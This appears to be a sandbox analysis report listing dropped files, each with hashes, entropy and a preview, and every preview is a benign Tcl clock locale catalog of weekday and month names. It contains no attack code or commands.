                                                                                                                                                                                                                              MD5:79AB7C13AA3833A1DAEADDB1144CCE55
                                                                                                                                                                                                                              SHA1:C01ABC2F16549CAEC6B081448B2CBA88A680E250
                                                                                                                                                                                                                              SHA-256:61462C325DB0065352D8155307F949869862A86CAC67AD7BB6703F57A7FA2FF3
                                                                                                                                                                                                                              SHA-512:79EB696164FDDD9B121558C2780E54E295FF2DC4D8E87A0DE507B4F2925612721A98FF5010199CB68CF894ACA7A07884E9E02F3DC1E078D241431E3DC884C0A1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset pl DAYS_OF_WEEK_ABBREV [list \.. "N"\.. "Pn"\.. "Wt"\.. "\u015ar"\.. "Cz"\.. "Pt"\.. "So"].. ::msgcat::mcset pl DAYS_OF_WEEK_FULL [list \.. "niedziela"\.. "poniedzia\u0142ek"\.. "wtorek"\.. "\u015broda"\.. "czwartek"\.. "pi\u0105tek"\.. "sobota"].. ::msgcat::mcset pl MONTHS_ABBREV [list \.. "sty"\.. "lut"\.. "mar"\.. "kwi"\.. "maj"\.. "cze"\.. "lip"\.. "sie"\.. "wrz"\.. "pa\u017a"\.. "lis"\.. "gru"\.. ""].. ::msgcat::mcset pl MONTHS_FULL [list \.. "stycze\u0144"\.. "luty"\.. "marzec"\.. "kwiecie\u0144"\.. "maj"\.. "czerwiec"\.. "lipiec"\.. "sierpie\u0144"\.. "wrzesie\u0144"\.. "pa\u017adziernik"\.. "listopad"\..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1177
                                                                                                                                                                                                                              Entropy (8bit):4.394980756969744
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83CYkjBc1yHYJt//0/I31YMY47flV7YaqgCyt9Fo8g6Gtvt76svi:43C5LHcNnxJ9Ltg6Gpt76Ki
                                                                                                                                                                                                                              MD5:8F53B3571DD29E12BD33349CFA32F28F
                                                                                                                                                                                                                              SHA1:C125E059B8BFE5FECD482D1A1DA50B8678872BF6
                                                                                                                                                                                                                              SHA-256:6F6EEEDDCF232BDCB952592A144810CED44A1CBB4BCC2C062D5F98D441505380
                                                                                                                                                                                                                              SHA-512:5CD7E7097B720E5399795126A71348816CBA697FD8F14160779E982ADAB00D5994978E2F9445785B0DE62F6F14232278AD1A65BC53730CA58D676B057F0BC406
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset pt DAYS_OF_WEEK_ABBREV [list \.. "Dom"\.. "Seg"\.. "Ter"\.. "Qua"\.. "Qui"\.. "Sex"\.. "S\u00e1b"].. ::msgcat::mcset pt DAYS_OF_WEEK_FULL [list \.. "Domingo"\.. "Segunda-feira"\.. "Ter\u00e7a-feira"\.. "Quarta-feira"\.. "Quinta-feira"\.. "Sexta-feira"\.. "S\u00e1bado"].. ::msgcat::mcset pt MONTHS_ABBREV [list \.. "Jan"\.. "Fev"\.. "Mar"\.. "Abr"\.. "Mai"\.. "Jun"\.. "Jul"\.. "Ago"\.. "Set"\.. "Out"\.. "Nov"\.. "Dez"\.. ""].. ::msgcat::mcset pt MONTHS_FULL [list \.. "Janeiro"\.. "Fevereiro"\.. "Mar\u00e7o"\.. "Abril"\.. "Maio"\.. "Junho"\.. "Julho"\.. "Agosto"\.. "Setembro"\.. "Outubro"\.. "Novembro"\.. "Dezembro"
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):286
                                                                                                                                                                                                                              Entropy (8bit):4.8608779725401785
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xofm6GPWWjofAW3vLjofAW3v6mjofm6T+3vnFDoAkvn:4EnLB383+NGdg93vk93v6fNK3v9dmn
                                                                                                                                                                                                                              MD5:A2626EA95C2480FEA68906AE6A1F6993
                                                                                                                                                                                                                              SHA1:A0592902337C00FC2E70B1DFB3A42453A86535BB
                                                                                                                                                                                                                              SHA-256:320BE7D5B730091E6FA35F196314737261C8E154577DCF6AC8C2057D44394AD7
                                                                                                                                                                                                                              SHA-512:9801A87D024565676D4F3EAF0702C213E59FC2B6719D8BE95C19C9ED53FC43487F65F5408378B401A2B4C2BD4E2E391C2D848CA87739A6082AB7766EC6B9EFE1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset pt_BR DATE_FORMAT "%d-%m-%Y".. ::msgcat::mcset pt_BR TIME_FORMAT "%T".. ::msgcat::mcset pt_BR TIME_FORMAT_12 "%T".. ::msgcat::mcset pt_BR DATE_TIME_FORMAT "%a %d %b %Y %T %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1224
                                                                                                                                                                                                                              Entropy (8bit):4.350784108088039
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83coPUMSeZmkTMm41icpK+7ZVoImEcVUCWdvHvWIn:43lPHFmkm1iMVoxEc+CWZPWIn
                                                                                                                                                                                                                              MD5:F6575EC17966320106FF7ABDFB3186E2
                                                                                                                                                                                                                              SHA1:68C6B72D664FDA27450FCE8B5734AB627CE825D7
                                                                                                                                                                                                                              SHA-256:25ED6AC7A353E23B954B98611AE3B7E56BDCF2B0CB0DB358253CFB8BEBBB831C
                                                                                                                                                                                                                              SHA-512:E564543231922A17C898419545BFA65E5E31FE9F005FDD201B735CFDE08E96FB3B98349C2A7959E29CA8F7E6934B0C4C6DE6B5E67209D0DD9A7746DFEBF037B3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ro DAYS_OF_WEEK_ABBREV [list \.. "D"\.. "L"\.. "Ma"\.. "Mi"\.. "J"\.. "V"\.. "S"].. ::msgcat::mcset ro DAYS_OF_WEEK_FULL [list \.. "duminic\u0103"\.. "luni"\.. "mar\u0163i"\.. "miercuri"\.. "joi"\.. "vineri"\.. "s\u00eemb\u0103t\u0103"].. ::msgcat::mcset ro MONTHS_ABBREV [list \.. "Ian"\.. "Feb"\.. "Mar"\.. "Apr"\.. "Mai"\.. "Iun"\.. "Iul"\.. "Aug"\.. "Sep"\.. "Oct"\.. "Nov"\.. "Dec"\.. ""].. ::msgcat::mcset ro MONTHS_FULL [list \.. "ianuarie"\.. "februarie"\.. "martie"\.. "aprilie"\.. "mai"\.. "iunie"\.. "iulie"\.. "august"\.. "septembrie"\.. "octombrie"\.. "noiembrie"\.. "decembrie"\.. ""].. ::msgcat:
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2091
                                                                                                                                                                                                                              Entropy (8bit):4.2886524607041006
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:43D+pQ7keidQfRQPgQHB81Z/sFIAZSQWQXQrQxJQjQRnQBFQiWftkWt:26pgkeoSnpjA4tMYiJcCMFmVRt
                                                                                                                                                                                                                              MD5:9F1C8DD58550558977821FD500E7C0E0
                                                                                                                                                                                                                              SHA1:EFDD809BC2872A5BE0E353D31BE6D7D72E4B829C
                                                                                                                                                                                                                              SHA-256:BB35BB6F07BAEF72C329EC3E95D6527A2736070EE2FFE5DE227E1FF0332390F8
                                                                                                                                                                                                                              SHA-512:AA3C5C40AE9D342F8287958355C3321CF60566AD3E84E3D18D782FC022A998DA275506A61010A65D2E7D7578F2919C47C63AB0BA63A38800AA48D4B88ACE54D3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ru DAYS_OF_WEEK_ABBREV [list \.. "\u0412\u0441"\.. "\u041f\u043d"\.. "\u0412\u0442"\.. "\u0421\u0440"\.. "\u0427\u0442"\.. "\u041f\u0442"\.. "\u0421\u0431"].. ::msgcat::mcset ru DAYS_OF_WEEK_FULL [list \.. "\u0432\u043e\u0441\u043a\u0440\u0435\u0441\u0435\u043d\u044c\u0435"\.. "\u043f\u043e\u043d\u0435\u0434\u0435\u043b\u044c\u043d\u0438\u043a"\.. "\u0432\u0442\u043e\u0440\u043d\u0438\u043a"\.. "\u0441\u0440\u0435\u0434\u0430"\.. "\u0447\u0435\u0442\u0432\u0435\u0440\u0433"\.. "\u043f\u044f\u0442\u043d\u0438\u0446\u0430"\.. "\u0441\u0443\u0431\u0431\u043e\u0442\u0430"].. ::msgcat::mcset ru MONTHS_ABBREV [list \.. "\u044f\u043d\u0432"\.. "\u0444\u0435\u0432"\.. "\u043c\u0430\u0440"\.. "\u0430\u043f\u0440"\.. "\u043c\u0430\u0439"\.. "\u0438\u044e\u
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):248
                                                                                                                                                                                                                              Entropy (8bit):4.9420431225061
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xoVAgWIZoVY9X3vtfNrsoVA9+3vW6Q9vn:4EnLB383SFWIyaX3vtNl/3vWHNn
                                                                                                                                                                                                                              MD5:DC98D88964650E302BE97FDB3B33326E
                                                                                                                                                                                                                              SHA1:1DDDCC4265D7B980B867FEE674BEF2FD87D823F7
                                                                                                                                                                                                                              SHA-256:13E4E79A0ED82034BADE0CFF8DEF5DE1222F6968108AD710662BDB7DAF36D7E1
                                                                                                                                                                                                                              SHA-512:F3B9D528C529DD520FEDA3C20ED354E521C5B3C29F3317E15B7939CE06A3D67554D34DD6E54FE038585E46C560C604A1FD7E7F84914086B5994D52CE2C9E99CE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ru_UA DATE_FORMAT "%d.%m.%Y".. ::msgcat::mcset ru_UA TIME_FORMAT "%k:%M:%S".. ::msgcat::mcset ru_UA DATE_TIME_FORMAT "%d.%m.%Y %k:%M:%S %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1212
                                                                                                                                                                                                                              Entropy (8bit):4.359036493565628
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83/YIXo4YY0dD6kMm7fX2NaSIvZdHZgHZ/IxvaGWxvtl9svWTN:43rLTR44/yWltOWB
                                                                                                                                                                                                                              MD5:E297221FA73BD78577B398BC7D061D21
                                                                                                                                                                                                                              SHA1:F2A6B456272F913A9E97C495CEE73AC774C90FA1
                                                                                                                                                                                                                              SHA-256:E65D6E5E837DF0A2DF0DB77BCE45334BBC27EFFF9023C37119E75D49932D9D6C
                                                                                                                                                                                                                              SHA-512:AB9DDAE7CB21193C7753041F0B88CF2D40987E7E604B47816219458D217F084AA4EBF36719E22AAB3FD71A271D9F956ADC353182991903D7ADE8C8F00F6B2F9B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset sh DAYS_OF_WEEK_ABBREV [list \.. "Ned"\.. "Pon"\.. "Uto"\.. "Sre"\.. "\u010cet"\.. "Pet"\.. "Sub"].. ::msgcat::mcset sh DAYS_OF_WEEK_FULL [list \.. "Nedelja"\.. "Ponedeljak"\.. "Utorak"\.. "Sreda"\.. "\u010cetvrtak"\.. "Petak"\.. "Subota"].. ::msgcat::mcset sh MONTHS_ABBREV [list \.. "Jan"\.. "Feb"\.. "Mar"\.. "Apr"\.. "Maj"\.. "Jun"\.. "Jul"\.. "Avg"\.. "Sep"\.. "Okt"\.. "Nov"\.. "Dec"\.. ""].. ::msgcat::mcset sh MONTHS_FULL [list \.. "Januar"\.. "Februar"\.. "Mart"\.. "April"\.. "Maj"\.. "Juni"\.. "Juli"\.. "Avgust"\.. "Septembar"\.. "Oktobar"\.. "Novembar"\.. "Decembar"\.. ""].. ::msgcat::mcset sh BC
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1255
                                                                                                                                                                                                                              Entropy (8bit):4.4043119723436135
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83c46o40u3rIsmJIcm93ApLDVb2IcU95WFGEXF3eUCvtz/v3e6:43c3ow3rF93Ap7tEXFREtznp
                                                                                                                                                                                                                              MD5:24DA40901D907D35195CC1B3A675EBC7
                                                                                                                                                                                                                              SHA1:8AF31248F06FADA5CFB0D83A940CFF5CE70E2577
                                                                                                                                                                                                                              SHA-256:976813F6C53C9BEBBF976B0F560FD7FC5E4EC4C574D7E1CD31F9A4056765CB7A
                                                                                                                                                                                                                              SHA-512:A9BC6AAFE9AEEDFD1E483E54A2D27871A09ADD6807D8F90410CD2BB82A91BA9DF435652EC9A7C3AD0A080D7F153CA848BB47DAD3936BA30E4AEFF3C474C433CC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset sk DAYS_OF_WEEK_ABBREV [list \.. "Ne"\.. "Po"\.. "Ut"\.. "St"\.. "\u0160t"\.. "Pa"\.. "So"].. ::msgcat::mcset sk DAYS_OF_WEEK_FULL [list \.. "Nede\u013ee"\.. "Pondelok"\.. "Utorok"\.. "Streda"\.. "\u0160tvrtok"\.. "Piatok"\.. "Sobota"].. ::msgcat::mcset sk MONTHS_ABBREV [list \.. "jan"\.. "feb"\.. "mar"\.. "apr"\.. "m\u00e1j"\.. "j\u00fan"\.. "j\u00fal"\.. "aug"\.. "sep"\.. "okt"\.. "nov"\.. "dec"\.. ""].. ::msgcat::mcset sk MONTHS_FULL [list \.. "janu\u00e1r"\.. "febru\u00e1r"\.. "marec"\.. "apr\u00edl"\.. "m\u00e1j"\.. "j\u00fan"\.. "j\u00fal"\.. "august"\.. "september"\.. "okt\u00f3ber"\.. "november"\.. "decem
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1216
                                                                                                                                                                                                                              Entropy (8bit):4.333705818952628
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83MIXpC9opYuGS/BrIsmZ5hv1yAxyIVjd392WFThENvt0vJoO:43fXYujZrqyApYJtyR
                                                                                                                                                                                                                              MD5:CB76F54CBE0D1AAE8BA956B4C51CBD2A
                                                                                                                                                                                                                              SHA1:C1F78375EDB0BD2504553E33B2024C0C63FDB1B2
                                                                                                                                                                                                                              SHA-256:11A6264676DBED87E4F718075127E32E107854F35F141642454F484984084486
                                                                                                                                                                                                                              SHA-512:69964348FF08DE6EEB5E3DD61057FF0DF5441105EB7BEE7FB7E9AC5E26DCC164E3C7C011CA5CD7BC5B97A7872532331C97CCBC80563F6C5A3548014BFA8BEF16
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset sl DAYS_OF_WEEK_ABBREV [list \.. "Ned"\.. "Pon"\.. "Tor"\.. "Sre"\.. "\u010cet"\.. "Pet"\.. "Sob"].. ::msgcat::mcset sl DAYS_OF_WEEK_FULL [list \.. "Nedelja"\.. "Ponedeljek"\.. "Torek"\.. "Sreda"\.. "\u010cetrtek"\.. "Petek"\.. "Sobota"].. ::msgcat::mcset sl MONTHS_ABBREV [list \.. "jan"\.. "feb"\.. "mar"\.. "apr"\.. "maj"\.. "jun"\.. "jul"\.. "avg"\.. "sep"\.. "okt"\.. "nov"\.. "dec"\.. ""].. ::msgcat::mcset sl MONTHS_FULL [list \.. "januar"\.. "februar"\.. "marec"\.. "april"\.. "maj"\.. "junij"\.. "julij"\.. "avgust"\.. "september"\.. "oktober"\.. "november"\.. "december"\.. ""].. ::msgcat::mcset sl B
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1321
                                                                                                                                                                                                                              Entropy (8bit):4.408176575111904
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83F7ONQEwXwjjTlVoSEh76W/X+WZQJ4hv+H6v2V:43NwjPEwl4VQ8q
                                                                                                                                                                                                                              MD5:E606F620F03EC0FBDBE6551601299C5F
                                                                                                                                                                                                                              SHA1:0B50AB679E8D90D8E7319BCADAC426E004594D3B
                                                                                                                                                                                                                              SHA-256:1F4EFD78F6B45B65F73F09B2F52FC13C2A7C4138DCB7664804878D197B6EBDF9
                                                                                                                                                                                                                              SHA-512:08AF2B51EB7111E334ADDA3A03F9A8816C104E9742B523EC363FB5131A3DF73D298A8DDCD573D23C23C65CCFD2B8898DF75AE3D4F04BF80744044FB6BAB5EC0A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset sq DAYS_OF_WEEK_ABBREV [list \.. "Die"\.. "H\u00ebn"\.. "Mar"\.. "M\u00ebr"\.. "Enj"\.. "Pre"\.. "Sht"].. ::msgcat::mcset sq DAYS_OF_WEEK_FULL [list \.. "e diel"\.. "e h\u00ebn\u00eb"\.. "e mart\u00eb"\.. "e m\u00ebrkur\u00eb"\.. "e enjte"\.. "e premte"\.. "e shtun\u00eb"].. ::msgcat::mcset sq MONTHS_ABBREV [list \.. "Jan"\.. "Shk"\.. "Mar"\.. "Pri"\.. "Maj"\.. "Qer"\.. "Kor"\.. "Gsh"\.. "Sht"\.. "Tet"\.. "N\u00ebn"\.. "Dhj"\.. ""].. ::msgcat::mcset sq MONTHS_FULL [list \.. "janar"\.. "shkurt"\.. "mars"\.. "prill"\.. "maj"\.. "qershor"\.. "korrik"\.. "gusht"\.. "shtator"\.. "tetor"\.. "n\u00ebntor"\.. "dhjetor"\.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2087
                                                                                                                                                                                                                              Entropy (8bit):4.307749748884122
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:43ilQTSBQrQP9QenzMKSFD9NI/QiNQEQrQL1KKYjU5rtAx:2I5EyLMKSFZNIYMzYMKKiqW
                                                                                                                                                                                                                              MD5:BF363AB60B57F6D8FDCDBFD230A28DDF
                                                                                                                                                                                                                              SHA1:6375CBA0A2197DA7E65BEE45C42F02C4F0B9142D
                                                                                                                                                                                                                              SHA-256:FA00A7B22C9941F6C2B893F22B703DCB159CA2F2E4005FD6A74A632AEB786BFA
                                                                                                                                                                                                                              SHA-512:91AD8085EF321A5A0E4D2ED204940CB66E8E230BBEDE59A8A07D1CEED9155FCC6B075A1FCC44AE834C1FEEEB3A59256C4310684C5AC453D4C50DFABD88469814
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset sr DAYS_OF_WEEK_ABBREV [list \.. "\u041d\u0435\u0434"\.. "\u041f\u043e\u043d"\.. "\u0423\u0442\u043e"\.. "\u0421\u0440\u0435"\.. "\u0427\u0435\u0442"\.. "\u041f\u0435\u0442"\.. "\u0421\u0443\u0431"].. ::msgcat::mcset sr DAYS_OF_WEEK_FULL [list \.. "\u041d\u0435\u0434\u0435\u0459\u0430"\.. "\u041f\u043e\u043d\u0435\u0434\u0435\u0459\u0430\u043a"\.. "\u0423\u0442\u043e\u0440\u0430\u043a"\.. "\u0421\u0440\u0435\u0434\u0430"\.. "\u0427\u0435\u0442\u0432\u0440\u0442\u0430\u043a"\.. "\u041f\u0435\u0442\u0430\u043a"\.. "\u0421\u0443\u0431\u043e\u0442\u0430"].. ::msgcat::mcset sr MONTHS_ABBREV [list \.. "\u0408\u0430\u043d"\.. "\u0424\u0435\u0431"\.. "\u041c\u0430\u0440"\.. "\u0410\u043f\u0440"\.. "\u041c\u0430\u0458"\.. "\u0408\u0443\u043d"\.. "\
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1219
                                                                                                                                                                                                                              Entropy (8bit):4.3542418837714285
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83qoLt6yLQoAusrIsmZ5m4AcjTHX92WFfjr4MvBvX:43ZLxQNusrr4Aw3Jkq1X
                                                                                                                                                                                                                              MD5:3B5C3FFA0829768470BDA1B46D882060
                                                                                                                                                                                                                              SHA1:C96799036EC5CCDE799A6B50CD7748908935A2F3
                                                                                                                                                                                                                              SHA-256:483916B51BD7E071E88F9EC36AAF3E08FEA823991532F832DE491C6C40B55A9F
                                                                                                                                                                                                                              SHA-512:684FA249123878AA7F856DF0FD3B0D9F041113CFEA8EEFA47D0E1948DA23694330BF0D62BA896A3891CD559C16CAE9330BF31508F530AC003D2929D5FD9246D8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset sv DAYS_OF_WEEK_ABBREV [list \.. "s\u00f6"\.. "m\u00e5"\.. "ti"\.. "on"\.. "to"\.. "fr"\.. "l\u00f6"].. ::msgcat::mcset sv DAYS_OF_WEEK_FULL [list \.. "s\u00f6ndag"\.. "m\u00e5ndag"\.. "tisdag"\.. "onsdag"\.. "torsdag"\.. "fredag"\.. "l\u00f6rdag"].. ::msgcat::mcset sv MONTHS_ABBREV [list \.. "jan"\.. "feb"\.. "mar"\.. "apr"\.. "maj"\.. "jun"\.. "jul"\.. "aug"\.. "sep"\.. "okt"\.. "nov"\.. "dec"\.. ""].. ::msgcat::mcset sv MONTHS_FULL [list \.. "januari"\.. "februari"\.. "mars"\.. "april"\.. "maj"\.. "juni"\.. "juli"\.. "augusti"\.. "september"\.. "oktober"\.. "november"\.. "december"\.. ""].. ::msgcat:
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1040
                                                                                                                                                                                                                              Entropy (8bit):4.108744949579904
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:4EnLB383A4mScvhkzoR4mtuWckRkoay3UVxMmALfG7IdzVJ633xRCPLMYMvYo76u:4aR83/Shkz1uckO76kMmEf62qOTdMvvn
                                                                                                                                                                                                                              MD5:5774860C8AEECBD48F1502E616158CAB
                                                                                                                                                                                                                              SHA1:DE7059713EA7913A0C79F5386833CE2BCAD2CFD7
                                                                                                                                                                                                                              SHA-256:1DA068C9AA02EF14A2440758C6040D632D96044A20EC501DBB9E40D8592E0E7F
                                                                                                                                                                                                                              SHA-512:91E69222DDF55E9E0E389DB77D7A0F2E082351DC3FB34A1A2C1E350E4187E8BB940F6C2EDE1B8651159C2787AA0BE4D7268F33F7A82CAED03514FCE462530408
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset sw DAYS_OF_WEEK_ABBREV [list \.. "Jpi"\.. "Jtt"\.. "Jnn"\.. "Jtn"\.. "Alh"\.. "Iju"\.. "Jmo"].. ::msgcat::mcset sw DAYS_OF_WEEK_FULL [list \.. "Jumapili"\.. "Jumatatu"\.. "Jumanne"\.. "Jumatano"\.. "Alhamisi"\.. "Ijumaa"\.. "Jumamosi"].. ::msgcat::mcset sw MONTHS_ABBREV [list \.. "Jan"\.. "Feb"\.. "Mar"\.. "Apr"\.. "Mei"\.. "Jun"\.. "Jul"\.. "Ago"\.. "Sep"\.. "Okt"\.. "Nov"\.. "Des"\.. ""].. ::msgcat::mcset sw MONTHS_FULL [list \.. "Januari"\.. "Februari"\.. "Machi"\.. "Aprili"\.. "Mei"\.. "Juni"\.. "Julai"\.. "Agosti"\.. "Septemba"\.. "Oktoba"\.. "Novemba"\.. "Desemba"\.. ""].. ::msgcat::mcset sw BCE "
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1874
                                                                                                                                                                                                                              Entropy (8bit):4.080580566597515
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83AI0xnJdnQhmHlHYPKtul+eOPfIxyH5ztUSLu8tptLtrl+eOPfIxyH5ztUSU:43N0dQmHlHYPKtu1HxMtr1Hx/
                                                                                                                                                                                                                              MD5:85288236C3997302EA26D7403BBA2C15
                                                                                                                                                                                                                              SHA1:05AB389CC4DCF17B37BFF6ED1ECD58D6E9850A01
                                                                                                                                                                                                                              SHA-256:AEFDC4255890D5B3FFE5CEE1B457B7D711283C2287ABA644155C10956012F6C1
                                                                                                                                                                                                                              SHA-512:8E389D46606176EE14B8356153095B49C9426B80139B672A620F488891F091D1A272D4FB116775900E4AB4EC84DDDEBD8D6AF81AC672F14F148F2BFC638D2B10
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
